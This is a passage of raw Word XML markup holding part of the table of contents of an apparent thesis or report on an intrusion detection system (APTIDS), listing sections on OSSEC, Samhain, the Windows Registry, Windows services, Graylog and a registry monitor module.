                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BACKGROUND AND RELATED WORKS</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962985 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962986" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Related works</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962986 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962987" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OSSEC</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962987 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962988" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Samhain</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962988 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962989" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Background</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962989 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962990" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows Registry</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962990 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962991" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows Service</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962991 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962992" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Graylog</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962992 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962993" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 3.</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PROJECT ARCHITECTURE</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962993 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962994" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APTIDS’s overall architecture</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962994 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc484962995" w:history="1">
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF" w:rsidRPr="00CA6F72">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Registry Monitor Module</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc484962995 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="006F1CBF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="006F1CBF" w:rsidRDefault="00345B0F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
